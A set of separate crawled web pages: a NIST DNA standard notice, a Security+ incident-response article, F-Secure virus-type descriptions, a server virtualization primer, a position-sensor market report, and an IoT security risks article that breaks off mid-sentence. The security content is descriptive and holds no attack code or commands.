human genomic DNA from three sources-an individual male, multiple female donors and a mix of male and female donors. Each sample has been prepared to yield an optical density (OD) of 1.0 on a spectrophotometer when examined using a 260-nanometer wavelength of light. Scientists have determined that for a solution of double-stranded DNA, an OD of 1.0 at 260 nanometers corresponds to 50 micrograms of DNA per milliliter of solution. More information about SRM 2372, including purchase data, may be found at https://srmors.nist.gov/view_detail.cfm?srm=2372.
<urn:uuid:9f8892d4-52fa-48dc-be51-a076f045e3a5>
CC-MAIN-2017-04
http://www.govtech.com/public-safety/New-SRM-Allows-Accurate-Accounting-of.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00205-ip-10-171-10-70.ec2.internal.warc.gz
en
0.89748
476
3.75
4
Incident response: Concept and procedures Incident is something that occurs every time or many a times. The incidence may be a good one or even be a bad one, but the basic thing in an incidence, whether it is bad or good, is that, it has a deep effect or impact on the entire system. Numerous incidences take place in the society every day. Police, Military, the corporation, the municipality, the hospitals, the fire brigade etc are the weapons or institutions that are used as a response to those societal incidences. Likewise, in computer or server network system, there also happens numerous types of incidences, and there also some agents or backup systems are there to provide a response to the entire incident or incidents. These responses are to be used at right location or for exact incidence, which requires bit knowledge about the incidences as well as their respective responses. In this article, there will be a short and effective discussion and understanding of the prominent incidences and their exact responses. In the preparation part of the response creation for an incident, the entire process is to be categorized in few steps. The steps are necessary since without the steps being followed, the actual response to the accurate incident could not be given. So, firstly one should know about the steps of providing Incident responses. For any problem, there requires a diagnosis, may be that is human health, or that may be anything, like an incidence of nature, a super-natural incidence or even a computer or network incidence. This diagnosis part plays the most important role in the entire process of knowledge development and also practical performance of a process. About the response to the incident, the first thing one should, or rather must do is making the occurrence of the incidence to the team leader and doing thus, making the team leader aware of the incident and so the incidence becomes escalated. This would be the first and foremost response to any server or network related incidence. If the incidence is about data theft, then the police is required to be informed but that would be a part of the responsibility of the Team leader. Escalation and notification Once the incidence of theft or leakage of important data or a security issue of any Personnel, House or even may be of the nation, then it is the duty and responsibility of the team leader to let his or her senior or Floor manager know about the incidence immediately. While putting the incident in the knowledge of the seniors, then, a Team leader must always put the time in the incidence reporting. The time must be in two categories. The first one is the time when, the incident came to the knowledge of him or her. The second is the time which has been reported to the Team leader by his or her subordinate as the time of occurrence of the incident. Once the incident is properly escalated to the seniors, it is also the duty of him or her to let the local Police know about the incidence of the data leakage or data theft. While reporting the police, the two things that should be mentioned to them are, the time of occurrence as is informed by the first viewer of the incident and the importance of the data that has been leaked or stolen. The rest would be done by the Police alone, where they may seal the server or put a special sensor on it to inspect every changes happening on them. Once the incident has been correctly identified and reported to the right and proper authority, then starts the mitigation step. Mitigation essentially means the process to lessen the effect of anything. In this case, it is understandable that, mitigation means to minimise the effect of the incident on the other things or settings in the server or network. For that the loops are to be checked or the network gates are to be locked to prevent intrusion into the system by external agents. This will surely prevent the extra data loss and may even make it easier for the cyber crime department of Police to easily track the lost data or the leaked data. Once the entire system is restored in its earlier configuration, then it is essential to turn down to the every single step and procedures applied for the entire response process, and keep a record of that. This record acts as a lesson for one, may be that is the Team leader or a general staff. However, sharing this episode as a lesson within the team will definitely increase the team's performance and experience to such incidences and also how to handle those incidences. Once those lessons are shared within the team, the lesson may also be recorded and marketed for gaining a recovery over company losses due to the data leakage or the recent data theft. The reporting part is very important for the security purpose, and this thing can increase the company's reputation although they have recently experienced a loss. Making a gain out of a loss is not a new strategy in the business world. Many a times, losses, made by a company, becomes the sources of the next huge gains. Likewise a single reporting of the fact or incidence and thus showing the concern for the data loss helps in two ways. Firstly the other servers are given an alert about the data, which when can be tracked if they are identified by the other servers. The second thing is that the company's name is highlighted and also being reputed for their strategy of showing responsibility for the data losses from their server. Thus reporting is not something that makes a bad impression of the company but it adds to the goodwill of the company. Sometimes an urge of apologize makes a great impression on something and even greater from the announcement of their best performances, as best performances, when announced shows the boldness of the company, where as the apologize is the symbol of concern and strictness to the responsibilities and duties of the company towards the data and storage of its. Once the data is recovered, it is time to restore the entire system. During the restoration process, proper back up of the system should be followed with inclusion of proper log and loops. This will easily track the intruder. In this process, the Forensic Department of Cyber crime segment of police may provide one with a big support. The support is not only to reconstitute the system, but also to provide a network to track the exact role and strategy of the intruder. So, one may need to form a Incidence Response team, and entrust them with incident response plan to protect the system from future incidences. But a plan is then only effective if that is updated every time. Cyber segment, in the modern world is the most dynamic system and so is an area where rapid changes are going on every time. Unless a plan based on this segment is made dynamic with common and uncommon updated every time, the plan turns poorer and poorer and ultimately that becomes useless and ineffective. So, the incident response team must be made up of the most dynamic natured employees and thus the plan also turns to be dynamic. The first responder is the first person to observe the incidence. He or she may have seen the incidence to be happening or otherwise he or she was the first person to observe the data to be missing, or to be leaked or deleted. When the police will be called, the interrogation part will include him or her as the first episode. Data will be collected mostly from him or her. When was the time he/she first saw the incident, what was his /her reaction to that instantly, what has been done initially by them to confirm the occurrence of the incident, and how were they confirmed that the incident has surely taken place. These are some of the common question that the first responder has to face. After that Police may take the finger prints on the systems and also of the employees working there, may go for DNA test even, for the suspected finger prints to identify the intruder. One may have to behave just like the police do after the happening of any incidence. Police seals the things attached with any incidence, like the room of incident, or the suspected elements used for the incident to occur. Just like that, one may need to isolate the incident by keeping the systems or devices attached with the incident. Quarantine: Quarantine is a medical terminology, which is used to refer the isolation of a patient, who is affected by a disease. Here the patient is the server or the devices and the disease is the incidence. So the first thing of the isolation process is to make the system idle from the server and thus making the disease locked in an area. Device removal : Once the device is isolated, then the operation is needed to remove the device from the server or the entire system. For that the looping or logging has to be again done. The loops are to be reconstructed as the response of the network must be kept intact, even after the removal of the device. Not only the loops but the logs are also to be changes as the previous logs may be hacked by the intruder, ad so keeping the system or server alive with the same log may be a open to risk situation. Data breach is an incident of data leakage or intentional data sharing. Generally this type of things, like data spill or data threat are prone to internal threat more than that of the external threat. Generally this information or data sharing need so many passwords and logs to pass by, that the process of making the incident occur also becomes tough for the hackers. So the finger pointing turns to the internal staffs. Therefore, identifying the incidence as a data loss or a data leakage is very important. Data loss may be due to the external threat, and mostly the external agents are the one who are generally involved in stealing of data. But, if the incident is a data breach then scenario is more critical, and the work of police becomes much simple and easy as the crime doer is within the team. Interrogating and finding out the crime offences by cracking the crime scenes is not a big deal for the Police Investigators. Damage and loss control Every incident, wherever that may be, and at what sector that may happen, bears with it some damage. If the damage is not even a loss of any fixed asset, then the Liabilities of a company to its clients, or the losses of the company due to inability of the company to finish up the assignment and the concurrent economic losses are surely to be among the some damages of the company due to the incidence. So that is to be maintained and restored by the company as quickly as possible. For restoring the losses, a loss control team can be built within the team. This team is going to plan the policy to control the losses or damages of the company due the incident and thus may easily restore the company's inside and outside stability by taking proper control plans. So, in short these are the steps or plans or the schedules of the incident response process, by following which, one can be responsible to his or her job, responsible to the security of his or her job, responsible to the security of the client or even to a nation. Knowing the steps to be followed after an incidence makes the decision making process at such a condition full of pressure and stress much easier.
<urn:uuid:53a423e8-c01e-4b57-a6fc-60248d19820c>
CC-MAIN-2017-04
https://www.examcollection.com/certification-training/security-plus-incident-response-concept-and-procedures.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00187-ip-10-171-10-70.ec2.internal.warc.gz
en
0.967159
2,236
3.15625
3
Resident viruses are viruses that stay active in memory after they are first run. These viruses usually trap one or more system functions, usually file access and execution functions. When a trapped system function is called, virus code gets control first and a virus can infect a file or a sector which is accessed by a system. After that the control is passed to a system function that was called. Depending on the settings of your F-Secure security product, it will either automatically delete, quarantine or rename the suspect file, or ask you for a desired action. More scanning & removal options More information on the scanning and removal options available in your F-Secure product can be found in the Help Center. You may also refer to the Knowledge Base on the F-Secure Community site for more information. Non-memory resident viruses are viruses that search for infectable files themselves. When such virus is run, it searches for files of specific name, type or extension on a hard drive and infects them. Some viruses have a limit on a number of files they can infect during one operation. This is done to hide a virus presence in a system as search and infection actions cause a lot of disk activity and can slow down an infected system considerably. Overwriting viruses are viruses that replace the contents of other files with their own code. The content of an infected file is destroyed. A system hit by an overwriting virus quickly becomes unusable. Overwriting viruses are the most destructive viruses among all others. Description Details: F-Secure Anti-Virus Research Team; F-Secure Corp.; July 14th, 2003
<urn:uuid:83a54b88-59a8-47b1-ae90-22a7c65617a1>
CC-MAIN-2017-04
https://www.f-secure.com/v-descs/virtypes.shtml
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00123-ip-10-171-10-70.ec2.internal.warc.gz
en
0.925114
328
3.140625
3
The terms "virtualization" and "virtual machine" have been lingua franca for the better part of a decade, tossed around freely in every corner of the IT world. If you didn't really know what they meant, you just nodded knowingly to get through the meeting. If you're already savvy in the area of virtualization, forgive us as we refresh our memories with a look at the core concepts. However, feel free to look through the recent resources below and get caught up on virtualization developments from the past couple of years. Actually, virtualization set down its roots more than 40 years ago, and certainly joined the computing lexicon in the 1970s when IBM introduced its VM (virtual machine) as sort of an overlay operating system. In the simplest sense, VM allowed an IBM mainframe to host two operating systems at the same time, allowing the users and applications employing each to think they were running on a dedicated machine. Today, virtualization is a concept applied to servers, networks, desktops, and storage. But it is server virtualization that drove the idea forward -- and, no, you don't need a $12 million mainframe to do it. As the idea of shared, networked computing resources (servers) advanced, it was common practice to dedicate a single server to an operating system and the applications that it supported, even if that software only used a tiny fraction of the hardware's capability. On the other hand, if the workload maxed out the hardware, the only solution ensuring uptime was to buy a bigger server and reinstall all of the software on the new platform. Virtualization techniques initially focused on that hardware utilization challenge, giving IT administrators the flexibility to run applications on whichever hardware platform was available, even across multiple servers. So some of the jobs running on a nearly maxed-out system could be shifted easily to the underused system as needed by letting those applications run in virtual machines without users knowing which hardware it was running on. Server virtualization provided IT with the ability to support applications as demand grew, and to consolidate other applications from underutilized servers. Cost savings on hardware and software licenses and ease of management were the key driving factors. As server virtualization has evolved, not just with software but with specially designed hardware enabling virtualization, benefits beyond cost have emerged. Yes, virtualization still aids consolidation and load sharing. It also can support scaling for global growth of the company, disaster recovery strategies, use of VMs for development and test, integration of digital telecommunications (VoIP phone) applications, and -- with the growth of software-defined networking -- virtual networks on the same types of servers that host email and office applications. Today, IT managers can choose from a variety of software options to implement server virtualization, with hypervisors -- which create and manage virtual machines -- and other management tools. Key software players and platforms include VMware, Microsoft, Red Hat, the Linux-based KVM, and Citrix with its open-source Zen technology. In addition, hardware companies such as Intel are designing their processors with virtualization capabilities. Need more details on server virtualization? Browse these resources: - The Software-Defined Data Center: Potential Game Changer. Extending virtualization across multiple data center technologies, the SDDC is intended to provide IT pros with improved flexibility in managing resources. - Server SANs And Healthy Paranoia. Server SANs, which dedicate storage resources to a server are targeted at virtualization admins as buyers. - Data Protection Must Change In Virtualization Age. While server virtualization can make life easier for the IT admin, it can complicate matters for IT security, particularly when it becomes challenging to figure out which VMs are running on which platforms. - Compromising Virtualization. Server virtualization is generally considered a first step into cloud computing. However, instance storage is a concept that can improve performance in a virtualized server/cloud environment, but also presents some challenges. - Governments Missing Out On Virtualization Savings. Some government agencies say that virtualization has led to cost savings, but there's a lot more to be done. - Microsoft, Others Closing In On VMware In Server Virtualization Market. VMware was the dominant provider in the virtualization market for a long time but by 2012 Microsoft, Citrix, and KVM were helping to level out prices. - Virtualization Vs. Networking. In addition to the security issues that virtualization can present, it also can overload a network with data and requests for data flowing from many VMs. - How Server Virtualization Works. Still need to know more about the basics of virtualization? Check out How Stuff Works and this general description.
<urn:uuid:deb0ccbf-9089-4402-9365-5d0d73e30d84>
CC-MAIN-2017-04
http://www.networkcomputing.com/software/guide-server-virtualization/536239712
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00517-ip-10-171-10-70.ec2.internal.warc.gz
en
0.935992
962
2.640625
3
Global Position Sensor Market Research Report Sensors are usually classified on the basis of their applications. For example, sensor used for measurement of pressure is known as pressure sensor and sensor used for measurement of humidity is known as humidity sensor. A type of sensor used for measuring the distance travelled by an object in regard to its reference point is known as position sensor. It is actually a measurement of an object movement or displacement from reference point or the initial position. The motion of the object can be linear, angular or multi-axis. On the basis of motion, sensors can be classified as linear position sensor or angular position sensor. Sensor used to detect object movement in straight line is termed as linear position sensor and sensor used to detect angular movements are termed as angular position sensor or rotational sensor. Position sensor can be classified on the basis of their sensing principles in order to measure the displacement of an object such as potentiometric position sensor, capacitive position sensor, linear voltage differential transformer, magnetostrictive linear position sensor, eddy current based position sensor, hall effect based magnetic position sensor, fiber-optic position sensor and optical position sensor. Potentiometric Position Sensor This sensor utilizes resistive effect for sensing. The basic principle is just the resistive or conductive track. For measuring the displacement of an object, a wiper is joined to the object or part of object. This wiper is in contact with the track. Potentiometric position sensor is convenient to use and of low cost and low technology. The main disadvantage is wear as a result of moving parts. Other disadvantages are low accuracy and repeatability, and limited frequency response. The three main types of potentiometers c) Plastic film Linear Variable Differential Transformer This is a type of position sensor which is free from mechanical wear problems. It comes into the category of inductive type position sensor. It is based on the same principle as AC transformer which is a movement measuring device. This device is very useful to measure linear displacement. Eddy current sensor It is not used for the measurement of displacement or angular rotation. This type of sensor is used to detect any object’s presence in front or within close proximity. It is a non contact position sensor based on the use of magnetic field for detection. Linear and Rotary Position Sensor Market Linear and Rotary Position Sensor Market and transducers undergo mechanical displacement in proportion to the input signal resulting into electrical signal. They found their applications in machine tools, material handling, test equipment, robotics and more, Linear and Rotary Position Sensor Market are typically used for position measurement by detecting angular or straight movement of the object. Presence sensing Edges Presence sensing Edges and Presence sensing Mats adds up to total Position Sensor market. Submarkets of Presence sensing Edges are Machine safety. Key Questions Answered What are market estimates and forecasts; which of... Presence sensing Mats Presence sensing Mats and Presence sensing Edges adds up to total Linear displacement sensor Linear displacement sensor and Proximity Sensor, Linear Position Sensor Submarkets of this market are Servo and Magnetic Field Sensor. ...
<urn:uuid:fb172207-e533-4f04-b6cd-d82455b43514>
CC-MAIN-2017-04
http://www.micromarketmonitor.com/market-report/position-sensor-reports-1538486253.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00241-ip-10-171-10-70.ec2.internal.warc.gz
en
0.89201
652
2.96875
3
Imagine the havoc that hackers could cause a nation by systematically targeting its power grid. Or the implications of criminals taking control over a city's network of video cameras. Or of a hacker taking control over a commercial airplane en route. While some of these risk scenarios may seem exaggerated, the ability of Stuxnet malware to cause physical damage has been shown in an Iranian nuclear facility. Last year, the Lloyds ‘Business Blackout' report stated that the U.S. power grid itself was at risk of a Stuxnet-style attack, potentially causing $1 trillion in damages. We need your help: After reading through the ten IoT security targets described in the article below, let us know your pick the item you think represents the biggest overall risk. 1. Industrial Facilities There is already an account of a hacked German steel mill, which caused massive damage to the facility. Criminals used a combination of spear phishing and social engineering to gain access to the steel mill’s office network. From there, the hackers gained access to the production system and took over industrial control components in the plant. It is difficult to know how off industrial plants are hacked for extortion because such breaches are rarely reported, according to Marina Krotofil of the Hamburg University of Technology. Phishing and social engineering attacks are not going away anytime soon, says Thomas Pore, director of IT and services at Plixer. “Commercial facilities, along with every organization, need to provide training to users on how to identify phishing attacks or how to avoid being a victim of social engineering,” he says. “Users need to be trained not to click on links in emails. Training should not be a one-time event, at time of hire, it should be performed regularly, even quarterly. When a phishing attempt is identified, an announcement should be made to employees as an example of how to identify. Authentication and privilege should be configured under the principle of least privilege as well as implementing software restriction policies to help prevent an actor from gaining access to critical resources should a breach occur. At this stage in the game, we need to operate our networks as though a breach will occur.” Two cybersecurity experts caused a ruckus in 2015 when they took control over a Jeep as it was cruising down the freeway. Although that was a stunt for Wired, the attack showed the potential for how dangerous such attacks could be in theory and led to its recall of 1.4 million vehicles. Fiat Chrysler recently indicated it had a new strategy for addressing security holes—pay security experts to find them. The company has a bug bounty program to reward experts anywhere from $150 to $1500 each time they find a security weakness and share it with the company. Recent evidence suggests that some high-tech thieves are now using laptops to steal cars. But the threats become much greater as cars become ever-more connected, not to mention semi- and fully-autonomous. “Perhaps it goes without saying that the most dangerous part of the connected car is the ‘connected’ part,” says Cesare Garlati, chief security strategist at prpl Foundation. “We’ve seen recently with the Nissan Leaf that researcher Troy Hunt was able to drain the car of its battery life using little more than its vehicle identification number (VIN) and accessing the car’s climate control system. While this, strictly speaking, isn’t life threatening, it’s a good example of how – using a little lateral thinking – one part of the car’s anatomy can be used to get to another.” Garlati says this could have dangerous consequences if hackers found their way into more critical functions, such as the steering and brakes as researchers were able to do with a Jeep back in 2014. “The situation is made worse because many engineers tasked with designing and building systems are not experts in network protocols and even less versed in network security,” Garlati says. “They may know how to put together hardware components, but implementing TCP/IP protocols is a rarefied discipline which requires expert knowledge and extensive debug and testing. While it’s unfair to expect mechanical and electrical engineers to shoulder this burden, the lack of subject matter expertise is leaving systems wide open to attack, something which vendors, regulators and manufacturers must carefully consider as the evolution of connected cars continues.” “The future of connected-cars has the potential of being very dangerous,” agrees Thomas Pore, director of IT and services at Plixer. “There is no such thing as infallible code, meaning that a product while completely secure today could be exploited tomorrow. Bug bounty programs have been around for a while but have increased in popularity, recently. This is great in concept and will prove useful as weaknesses will be discovered however this does not remove all the risk. Ethical security experts will reap the rewards, but what about the unethical actors out there that could care less about $1500, but will hold out for the highest bidder. Zero-day vulnerbilities around autonomous features could be exploited to create giant traffic jams or even in assassination attempts.” 3. Video Cameras Surveillance cameras are intended to make us more secure, and many cities across the U.S. have installed them, thanks to grants from the Department of Homeland Security. But the wireless networks used for transferring video signals can be insecure. In 2014, two security experts announced at Defcon that they managed to break into a police wireless mesh network in an unnamed town. “We could do all sorts of tomfoolery — hey, let’s have Godzilla walk down the street,” said Dustin Hoffman, the president of Exigent Systems to VentureBeat. “Or we could do the opposite and send police resources elsewhere.” “Another risk with video cameras—and other IoT devices—is the ability for them to be used to create botnets to send spam and ransomware, launch DDoS attacks, and commit other mischief,” Cesare Garlati, chief security strategist at prpl Foundation says. “The very fact that patching isn't high on the priority list for admins is testament to why security in devices like CCTV cameras needs to be ‘baked in' at the chip or hardware layer. If we don't take steps now to improve security within devices at the development level, the results could be catastrophic, especially when they can be hijacked and directed at critical infrastructure.” “Cameras will always be a target of hackers as they can potentially provide sensitive video or even audio into a target network,” says Thomas Pore, director of IT and services at Plixer. “Additionally, a compromised camera can be used to a critical foothold into a target network as well as be used to alter audio/visual settings that would interfere with monitoring. They are often easy targets as many deploy cameras with public facing IPs, allowing anyone to send/receive packets from it. Also, camera firmware is often not maintained for great length as development of newer technologies becomes a priority, and even if firmware does get patched, many cameras will never see an update. In the case of 2 experts hacking into a wireless mesh network, it was identified that this was largely based on implementation failure from the vendor. Perhaps this could have been avoided by betting managing/monitoring risk during vendor selection.” 4. IoT-Enabled Spying and Potential for Cyberwarfare “Science fiction cyber-war is here,” according to Oscar-winning filmmaker Alex Gibney whose recent Zero Days flick examines that Stuxnet worm that was far more advanced than ordinary malware. Purportedly developed by the U.S. and Israel, the Stuxnet worm proved that it is now possible for a worm to attack critical infrastructure. The worm was first detected about six years ago and is reported to have ruined of fifth of Iran’s nuclear centrifuges. Stuxnet can target programmable logic controllers (PLCs) and supervisory control and data acquisition (SCADA) systems, enabling it to target a vast number of systems. According to the film Zero Days, it is likely that Stuxnet represents the first example of an entirely new class of cyberweapons. After Iran discovered the worm, the nation would go on expand their nuclear program and create one of the largest cyber-armies in the world. In 2012, Iran would go onto attack Saudi Aramco, the biggest oil company in the world. Earlier this year, 7 Iranians were charged with launching computer attacks targeting American banks and a dam in New York. The United States purportedly developed and shelved a plan known as Nitro Zeus designed to bring down Iran’s air defenses, communications equipment, and much of its electrical grid. On a related note, the Internet of Things could provide new avenues for spying. NSA deputy director Richard Ledgett admitted as much earlier this year, stating that the agency was looking into spying on the Internet of Things. “In a Black Hat 2015 presentation, researchers Runa Sandvik and Michael Auger claimed to have found a way to hack the ShotView targeting system on Tracking Point’s hi-tech Linux-powered rifles,” explains Cesare Garlati, chief security strategist at prpl Foundation. “The company’s .338 TP bolt-action sniper rifle is said to provide precise impact on targets out to .75 mile. Although they claimed the company had ‘done a lot right’ and minimized the attack surface, the researchers were still able to compromise the rifle via its Wi-Fi connection, exploiting software vulnerabilities to prevent the gun from firing, or even to cause it to hit another target according to their instructions.” Fortunately, a remote attack on the rifle couldn’t make it fire as that requires a physical pull on the trigger, Garlati adds. “However, Sandvik and Auger were able to demonstrate how to effectively brick the rifle, making its computer-based targeting permanently unusable. For a weapon that costs $13,000 and could be highly dangerous in the wrong hands, the research is concerning.” 5. Power Grids and Utilities In January, Ukraine accused Russian hackers of shutting down almost a quarter of its power infrastructure, knocking out at least 30 of its 135 power substations. While matching that feat in the United States may be slightly more complicated, it is not apparently very difficult at some facilities here. In April, a team of white-hat hackers known as RedTeam showed how easy it was to break into a U.S. power company’s grid in a matter of days. In addition, cybersecurity experts have been warning of the risk of hackers breaching the power grid and natural gas pipelines. The fact that squirrels and other rodents cause some 200 power outages per year raises the question of what determined cyber-attackers could do. Imagine the impact of wiping out power of, say, most of the East Coast for even 24 hours. It is not only an abstract risk. In 2013, the Metcalf sniper attack of a California energy grid caused $15 million in damages. “Yes, squirrels or other rodents can take out power due to their physical access,” Pore says. “The electrical substation that services my house is a few miles down the road and supplies power to an entire town. It also happens to be located just off the road (~50 ft) guarded by nothing more than a chain link fence. Imagine the damage someone could do simply tossing a bomb over the fence or driving a car bomb into the center of the sub station,” Pore adds. “One could do some very serious damage quickly since it is unguarded,” Pore explains. “Since networks of power grids and utilities are classified as a critical sector, their should be continuous audits and penetration testing performed, similar to RedTeam breaking a power grid. Simply following a framework, such as NIST, is not enough anymore. The bad guys are reading the same material and to maintain operation excellence, additional security strategies and analytic modeling using network traffic coupled with contextual detail, user/badge authentications, will need to be implemented.” The Stuxnet worm, which was already mentioned here, was reportedly developed to bring down Iran’s nuclear power plants suspected of enriching uranium. “The attack on Ukraine’s power grid was a very frightening example!” says Cesare Garlati, chief security strategist at prpl Foundation. “At its core, it involved connected devices used in industrial control and automation (IoT): attackers wrote malicious firmware to replace the legitimate firmware on serial-to-Ethernet converters at more than a dozen substations (the converters are used to process commands sent from the SCADA network to the substation control systems). Taking out the converters prevented operators from sending remote commands to re-open breakers once a blackout occurred.” “While targeted attacks such as Stuxnet and Nitro Zeus are carefully articulated to gain entry into secure facilities, the world of IoT creates significantly more opportunities to get a foothold into a network. It is not surprising that the NSA is excited to see the market grow quickly,” Pore says. “In an effort for companies to get products to market first, product security takes a back seat to product design. IoT is supposed to make life more convenient, however convenience compromises security.” The building industry has been slower than many to embrace digital technology. But that is beginning to change quickly as building automation technology rapidly gains in popularity. As more buildings become connected, the risk for exploits increases. Already in 2013, Google saw its Wharf 7 office in Sydney, Australia get hacked by way of its building management system. One of the hackers, Billy Rios, told BBC that the building systems were very simple to breach. Rios estimates that there are some 50,000 globally that are connected. Of those, 2000 are online and don’t have any password protection, inviting criminals to access their heating and cooling systems and potentially take control over their connected door locks. “The home is something that is precious – you wouldn’t just allow anyone through your front door, so why do people do it with their connected devices so willingly?” Garlati asks. “When it comes to IoT in the home, people must realize that security of these devices just doesn’t exist yet.” “A case such as the exposure of vulnerabilities in Samsung’s SmartHome platform bring forward a number of questions, particularly: Do these systems really need a mobile app? Does the app really need to connect to central server in the cloud? And most importantly, is it sound to have a smartphone (especially running on Android) control anything that is critical to you?” Garlati says. “These are all key questions to address when we look at IoT especially in the home as a vast majority will not use apps that are developed by the OEM, but rather assembled using a host of third parties – of which they have no control or visibility over,” Garlati notes. “To combat this, OEMs should implement open and interoperable standards in their devices and Home IoT Architecture should rely only on a local hub, and this hub should be secured. If researchers can break these devices, it’s a safe bet that criminals may have already found a way in, too.” “You can do all the vulnerability patching you want, but if the basic security strategy of authentication for privilege is not being configured, it’s time to reevaluate the vendor,” Thomas Pore says. “Developing guidelines on how tech will be deployed and auditing the deployment based on the guidelines will help reduce third party risk.” 7. City Infrastructure and Transportation Networks Last year, Cesar Cerrudo, CTO of IOActive Labs proclaimed that many cities risk cyberattacks—even those who don’t consider themselves to be so-called “smart cities.” The majority of cities around the world use at least some form of connected technology to manage everything from traffic to lighting to public transit. Still, few cities engage in regular cybersecurity testing, and many have weak security controls in place. But it doesn't take a full-fledged cyberattack to cause problems. Even software bugs can cause significant glitches. For instance, Lake Tahoe–adjacent Placer County accidentally summoned 12,000 of its citizens to jury duty on one morning in May 2012, snarling traffic in the air. And on November 22, 2013, the San Francisco Bay Area Rapid Transit (BART) system was brought to its news as a result of a software glitch, trapping a total of 500 to 1000 passengers onboard. “We’ve also seen that Transport for London is looking to IoT sensors and the data they provide to help improve congestion for commuters, but they must not overlook wider security and privacy implications this will have on the City of London,” Garlati explains. “IoT, although growing at an enormous pace, is still very much in its infancy – with people eager to get their hands on the latest and greatest connected devices and manufacturers rushing to get them to market – security is often an afterthought.” If IoT developers don’t take steps now to improve security within devices at the development level, the results could be catastrophic, especially when used to capture data on passengers and whole cities as suggested by TfL’s CIO, Steve Townsend. “At best, people’s privacy and civil liberties are affected. At worst, poor security controls will mean terrorists will have access to a whole host of information they can use for surveillance or other nefarious purposes when security controls aren’t properly addressed,” Garlati says. For this reason the prpl Foundation has provided guidance on how to create a more secure Internet of Things that advises manufacturers and developers to adopt a hardware-led approach that sees security embedded from the ground up. 8. Medical Devices and Hospitals The security used in many medical devices and hospitals lags behind that used in many other industries. Not long ago, it was a common occurrence for some medical devices to have hard-coded passwords. Within hospitals, tales abound of staff that have Post-It notes with passwords scribbled on them. Already, several hospitals have been hit with ransomware including Hollywood Presbyterian Medical Center in Los Angeles, which was attacked earlier this year. Attackers brought down computers for a week using ransomware and ultimately extorted $17,000 from hospital administrators. The notion of terrorists hacking the vice president’s pacemaker was made famous in the show Homeland. While it is theoretically possible for hackers to maim or kill patients that use medical devices, perhaps a bigger threat relates to data breaches. Medical devices that are connected to databases with sensitive patient information that can be used for identity theft. Hackers could breach IoT-enabled hearing aids to snoop on people at home and at work. “Healthcare is another industry that is coming to rely on connected devices and smart sensors to help medical professionals provide more effective patient care,” Garlati explains. “However, the US Food and Drug Administration (FDA) was forced to warn hospitals in 2015 against using a popular internet-connected drug infusion pump after research from Billy Rios revealed it could be remotely hacked. Attacks like this may be harmful to human lives as medicine applied in wrong dosages becomes a potentially lethal weapon. It had the following warning: “This could allow an unauthorized user to control the device and change the dosage the pump delivers, which could lead to over- or under-infusion of critical patient therapies.” The affected devices were the Hospira Symbiq Infusion System (v3.13 and earlier), the Plum A+ Infusion System (v13.4 and earlier), and the Plum A+ 3 Infusion System (v13.6 and earlier). “The manufacturer has claimed there are no known cases where these pumps have been accessed remotely by unauthorized parties. It is also claiming that most of these devices will be replaced in the next 2–3 years,” Garlati explains. “However, with the healthcare IoT market set to be worth $117 billion by 2020, according to MarketResearch.com, there’s an increasing need for manufacturers to reengineer vital systems to ensure they can’t be misused in this way.” “Medical Personally identifiable information (PII) is worth considerably more than other types of PII and sells for 10–20 times the price of a U.S. credit card number on the dark web,” Pore says. “The risk around compromising medical devices within hospitals, even ransomware, is geared around the real-time assistance the hospital provides. Hospitals cannot afford to have their servers locked down with ransomware and restoring from a backup takes time, which many do not have. The risk of physical harm around compromising medical records lays around the concept of a mixed medical record where someone receives care in the name of someone else. The fraudulent user’s medical information becomes mixed in with the true patient’s information which could have severe consequences, such as the prescriptions of medications. Routine off-site or off-network backups of critical systems is the only sure-fire way to recover from ransomware. User training to identify phishing attacks is also paramount. User just love clicking on URLs in email. The FBI is taking a firm stance on not paying ransoms, however each case is different.” Last year, Chris Roberts, a security researcher at One World Labs, made headlines after boasting that he hacked into a United Airlines jet and modified code on the craft’s thrust management computer while onboard. An FBI search warrant states that he succeeded in commanding the plane to climb, altering the plane’s course. Roberts told the FBI that he had identified vulnerabilities in several commercial aircraft, including the Boeing 737-800, 737-900, 757-200, and the Airbus A-320. Roberts boasted that, in 2012, he had hacked into the International Space Station. Airplanes today are controlled by complex connected computer systems. “Sensors all over the aircraft monitor key performance parameters for maintenance and flight safety,” Garlati explains. “On-board computers control everything from navigation to in-cabin temperature and entertainment systems. Chris Roberts was apparently able to overwrite code on the airplane’s Thrust Management Computer while aboard a flight, causing a plane to move laterally in the air.” Roberts denies having done this during a real flight and Boeing has claimed in-flight entertainment systems are isolated from flight and navigation systems. However, when it comes to the aviation industry the stakes are even higher with regards to potential flaws in IoT systems. “As airlines transition to even more advanced systems leveraging these technologies more attention needs to be focused on underlying system weaknesses that could represent a security and safety risk,” Garlati explains. He asks: - What are airports doing well on this front and what's still missing? - What is the one major step all airports should take to avert an attack (perhaps hiring a cyber expert? employ a crisis management system?) “Airport managers must understand that security is likely to fail if it’s not built in by design,” Garlati says. “In fact, I would go so far as to say that if it’s not secure, it doesn’t work. So the mindset of pen testing and bringing on cyber security experts at a later date to ‘fix holes’ is a false economy- having said that, it is obviously better than nothing,” he adds. “But industry as a whole needs to change this mindset and work towards building and developing systems and devices with security at the core. The march of silicon means that it is becoming more powerful and so it is possible to add traditional security layers embedded at the hardware level, making it resilient to attack.” Hackers with physical access will be able to accomplish significantly more damage, and traditionally access is the difficult part. “In the case of Chris Roberts hacking an aircraft physical access was the easy part, using the seat electronic box (SEB) which was present for the inflight entertainment system,” Pore says. “Network segmentation would definitely have slowed down the attack and perhaps prevented Roberts from accessing critical aircraft management systems. It was noted in the FBI interview that Roberts used default credentials to gain access. There is always significant risk involved with leaving physical access available and not changing default credential sets.” 10. Retail Stores and Databases Last year, Tripwire announced the results of a study conducted by Atomic Research that found that retail security lags behind that of many other sectors. While many of the cybersecurity risks facing retailers aren’t strictly IoT related, a growing number of them are. For instance, in 2014, hackers managed to break into Target’s financial systems unit by way of an HVAC unit. The criminals responsible for the attack managed to steal network credentials from an HVAC vendor who had worked at a number of Target facilities in addition to other large retailers. Retail companies remain 